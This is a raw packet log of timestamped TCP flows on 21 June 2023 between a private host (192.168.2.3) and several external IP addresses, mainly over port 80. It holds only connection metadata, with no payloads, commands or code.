Jun 21, 2023 04:27:56.673844099 CEST	80	49722	77.28.83.241	192.168.2.3
Jun 21, 2023 04:27:56.673904896 CEST	80	49722	77.28.83.241	192.168.2.3
Jun 21, 2023 04:27:56.673950911 CEST	80	49722	77.28.83.241	192.168.2.3
Jun 21, 2023 04:27:56.673995972 CEST	80	49722	77.28.83.241	192.168.2.3
Jun 21, 2023 04:27:56.674052000 CEST	49722	80	192.168.2.3	77.28.83.241
Jun 21, 2023 04:27:56.674294949 CEST	49722	80	192.168.2.3	77.28.83.241
Jun 21, 2023 04:27:56.693814039 CEST	49721	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:56.693875074 CEST	443	49721	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:56.720403910 CEST	80	49722	77.28.83.241	192.168.2.3
Jun 21, 2023 04:27:56.720478058 CEST	80	49722	77.28.83.241	192.168.2.3
Jun 21, 2023 04:27:56.720534086 CEST	49722	80	192.168.2.3	77.28.83.241
Jun 21, 2023 04:27:56.720662117 CEST	49722	80	192.168.2.3	77.28.83.241
Jun 21, 2023 04:27:56.720663071 CEST	49722	80	192.168.2.3	77.28.83.241
Jun 21, 2023 04:27:56.766388893 CEST	80	49722	77.28.83.241	192.168.2.3
Jun 21, 2023 04:27:57.420447111 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.445990086 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.447889090 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.449692965 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.475074053 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.475158930 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.475231886 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.475313902 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.475363016 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.475413084 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.475445986 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.475445986 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.475509882 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.475558043 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.475606918 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.475642920 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.475677013 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.475702047 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.475744009 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.476315022 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.501173973 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.501238108 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.501285076 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.501329899 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.501357079 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.501383066 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.501430988 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.501482964 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.501529932 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.501549006 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.501590967 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.501646042 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.501661062 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.501707077 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.501760006 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.501774073 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.501817942 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.501864910 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.501884937 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.501929045 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.501981974 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.501996040 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.502042055 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.502084970 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.502105951 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.502151012 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.502197027 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.502252102 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.502265930 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.502449989 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.527700901 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.527764082 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.527812958 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.527856112 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.527898073 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.527945995 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.527998924 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.528012991 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.528059959 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.528114080 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.528127909 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.528160095 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.528194904 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.528239965 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.528316021 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.528352976 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.528388977 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.528435946 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.528489113 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.528532982 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.528584957 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.528599024 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.528642893 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.528690100 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.528712034 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.528755903 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.528801918 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.528820992 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.528865099 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.528918982 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.528933048 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.528978109 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.529025078 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.529043913 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.529088020 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.529134035 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.529155970 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.529200077 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.529247046 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.529300928 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.529315948 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.529360056 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.529405117 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.529424906 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.529457092 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.529488087 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.529535055 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.529580116 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.529599905 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.529642105 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.529685020 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.529728889 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.529748917 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.529783964 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.529812098 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.529858112 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.529911995 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.529927015 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.529972076 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.530138016 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.555336952 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.555387974 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.555432081 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.555469990 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.555510044 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.555557013 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.555602074 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.555623055 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.555669069 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.555722952 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.555742979 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.555742979 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.555799961 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.555845976 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.555867910 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.555918932 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.555932045 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.555977106 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.556029081 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.556042910 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.556087017 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.556132078 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.556150913 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.556195021 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.556240082 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.556294918 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.556325912 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.556372881 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.556416988 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.556441069 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.556468010 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.556504965 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.556548119 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.556597948 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.556611061 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.556654930 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.556698084 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.556719065 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.556761026 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.556813002 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.556827068 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.556871891 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.556919098 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.556941032 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.556982040 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.557029009 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.557051897 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.557092905 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.557138920 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.557162046 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.557204962 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.557250977 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.557272911 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.557317972 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.557363033 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.557391882 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.557429075 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.557475090 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.557495117 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.557537079 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.557580948 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.557600975 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.557643890 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.557694912 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.557710886 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.557753086 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.557805061 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.557818890 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.557862043 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.557905912 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.557926893 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.557970047 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.558016062 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.558060884 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.558082104 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.558125973 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.583322048 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.583373070 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.583420992 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.583468914 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.583491087 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.583525896 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.583556890 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.583604097 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.583651066 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.583672047 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.583714008 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.583759069 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.583780050 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.583825111 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.583870888 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.583916903 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.583937883 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.583981037 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.584027052 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.584047079 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.584090948 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.584135056 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.584155083 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.584197044 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.584218025 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.584280968 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.584336996 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.584350109 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.584394932 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.584440947 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.584462881 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.584506035 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.584548950 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.584567070 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.584609032 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.584656000 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.584700108 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.584718943 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.584764004 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.584810972 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.584830046 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.584872007 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.584888935 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.584934950 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.584980011 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.584999084 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.585043907 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.585091114 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.585108995 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.585151911 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.585196018 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.585248947 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.585263014 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.585304976 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.585349083 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.585367918 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.585406065 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.585428953 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.585474968 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.585519075 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.585537910 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.585582972 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.585629940 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.585676908 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.585696936 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.585732937 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.585758924 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.585799932 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.585844994 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.585886955 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.585906029 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.585948944 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.585992098 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.586013079 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.586042881 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.586042881 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.611320019 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.611464977 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.611512899 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.611537933 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.611583948 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.611632109 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.611684084 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.611699104 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.611742973 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.611793041 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.611810923 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.611859083 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.611881018 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.611926079 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.611979961 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.611994028 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.612040043 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.612085104 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.612139940 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.612154007 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.612200022 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.612221956 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.612286091 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.612330914 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.612359047 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.612396955 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.612457037 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.612512112 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.612528086 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.612570047 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.612591028 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.612634897 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.612680912 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.612723112 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.612767935 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.612812996 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.612834930 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.612876892 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.612930059 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.612945080 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.612988949 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.613034964 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.613080978 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.613101006 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.613135099 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.613163948 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.613207102 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.613251925 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.613296032 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.613317013 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.613362074 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.613406897 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.613431931 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.613476038 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.613497972 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.613542080 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.613590956 CEST	80	49719	45.9.74.80	192.168.2.3
